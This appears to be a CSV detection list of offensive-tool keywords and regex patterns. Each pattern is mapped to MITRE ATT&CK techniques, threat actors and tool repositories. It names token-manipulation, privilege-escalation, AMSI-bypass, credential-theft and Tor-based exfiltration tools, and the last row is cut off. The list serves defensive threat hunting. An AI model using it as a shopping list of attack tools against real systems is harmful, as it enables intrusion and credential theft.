"*TokenTactics.psd1*",".{0,1000}TokenTactics\.psd1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*TokenTactics.psm1*",".{0,1000}TokenTactics\.psm1.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*TokenTactics-main.zip*",".{0,1000}TokenTactics\-main\.zip.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","539","85","2023-11-04T19:29:55Z","2021-07-08T02:28:12Z" "*TokenUniverse.dproj*",".{0,1000}TokenUniverse\.dproj.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*TokenUniverse.exe*",".{0,1000}TokenUniverse\.exe.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" 
"*TokenUniverse-master.zip*",".{0,1000}TokenUniverse\-master\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*TokenUniverse-x64.zip*",".{0,1000}TokenUniverse\-x64\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*TokenUniverse-x86.zip*",".{0,1000}TokenUniverse\-x86\.zip.{0,1000}","offensive_tool_keyword","TokenUniverse","An advanced tool for working with access tokens and Windows security policy.","T1134 - T1055 - T1056 - T1222 - T1484","TA0004 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/diversenok/TokenUniverse","1","1","N/A","8","6","529","67","2024-04-12T02:04:50Z","2018-06-22T21:02:16Z" "*Tokenvator*",".{0,1000}Tokenvator.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to alter privilege with Windows Tokens","T1055 - T1003 - T1134","TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator*.exe*",".{0,1000}Tokenvator.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" 
"*Tokenvator.csproj*",".{0,1000}Tokenvator\.csproj.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.exe*",".{0,1000}Tokenvator\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.git*",".{0,1000}Tokenvator\.git.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.pdb*",".{0,1000}Tokenvator\.pdb.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.Plugins*",".{0,1000}Tokenvator\.Plugins.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.Resources*",".{0,1000}Tokenvator\.Resources.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator.sln*",".{0,1000}Tokenvator\.sln.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*Tokenvator/MonkeyWorks*",".{0,1000}Tokenvator\/MonkeyWorks.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*token-vault steal*",".{0,1000}token\-vault\ssteal.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.cna*",".{0,1000}token\-vault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.x64.o*",".{0,1000}token\-vault\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "*token-vault.x86.o*",".{0,1000}token\-vault\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","1","N/A","10","10","136","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" 
"*TokenViewer.exe*",".{0,1000}TokenViewer\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*tokyoneon/Chimera*",".{0,1000}tokyoneon\/Chimera.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","10","10","1309","228","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" "*tomcarver16/ADSearch*",".{0,1000}tomcarver16\/ADSearch.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*tomcat_mgr_default_userpass.txt*",".{0,1000}tomcat_mgr_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*tomcat-rootprivesc-deb.sh*",".{0,1000}tomcat\-rootprivesc\-deb\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*tomcatWarDeployer -v -x -p * -H * ",".{0,1000}tomcatWarDeployer\s\-v\s\-x\s\-p\s.{0,1000}\s\-H\s.{0,1000}\s","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Tool-PassView*",".{0,1000}Tool\-PassView.{0,1000}","offensive_tool_keyword","Tool-PassView","Password recovery or exploitation","T1003 - T1021 - T1056 - T1110 - T1212","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/password_recovery_tools.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*tools/ligolo*",".{0,1000}tools\/ligolo.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - 
T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*top100_sublist.txt*",".{0,1000}top100_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*top1000_sublist.txt*",".{0,1000}top1000_sublist\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*Top109Million-probable-v2.txt*",".{0,1000}Top109Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top12Thousand-probable-v2.txt*",".{0,1000}Top12Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top1575-probable-v2.txt*",".{0,1000}Top1575\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top1pt6Million-probable-v2.txt*",".{0,1000}Top1pt6Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top207-probable-v2.txt*",".{0,1000}Top207\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top29Million-probable-v2.txt*",".{0,1000}Top29Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top2Billion-probable-v2.txt*",".{0,1000}Top2Billion\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*Top304Thousand-probable-v2.txt*",".{0,1000}Top304Thousand\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" 
"*Top353Million-probable-v2.txt*",".{0,1000}Top353Million\-probable\-v2\.txt.{0,1000}","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8454","1605","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" "*topotam.exe*",".{0,1000}topotam\.exe.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*topotam/PetitPotam*",".{0,1000}topotam\/PetitPotam.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*top-usernames-shortlist.txt*",".{0,1000}top\-usernames\-shortlist\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*tor --DataDirectory *",".{0,1000}tor\s\-\-DataDirectory\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. 
Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*tor@default.service*",".{0,1000}tor\@default\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","service name","10","10","N/A","N/A","N/A","N/A" "*tor_hiddenservices.rb*",".{0,1000}tor_hiddenservices\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*tor_services.py*",".{0,1000}tor_services\.py.{0,1000}","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","147","39","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*tor2web start*",".{0,1000}tor2web\sstart.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web stop*",".{0,1000}tor2web\sstop.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web.pid*",".{0,1000}tor2web\.pid.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web.service*",".{0,1000}tor2web\.service.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web/Tor2web*",".{0,1000}tor2web\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web_notification_form*",".{0,1000}tor2web_notification_form.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-cert.pem*",".{0,1000}tor2web\-cert\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-default.conf*",".{0,1000}tor2web\-default\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-dh.pem*",".{0,1000}tor2web\-dh\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-globaleaks.conf*",".{0,1000}tor2web\-globaleaks\.conf.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-hidden*",".{0,1000}tor2web\-hidden.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-intermediate.pem*",".{0,1000}tor2web\-intermediate\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*tor2web-key.pem*",".{0,1000}tor2web\-key\.pem.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense 
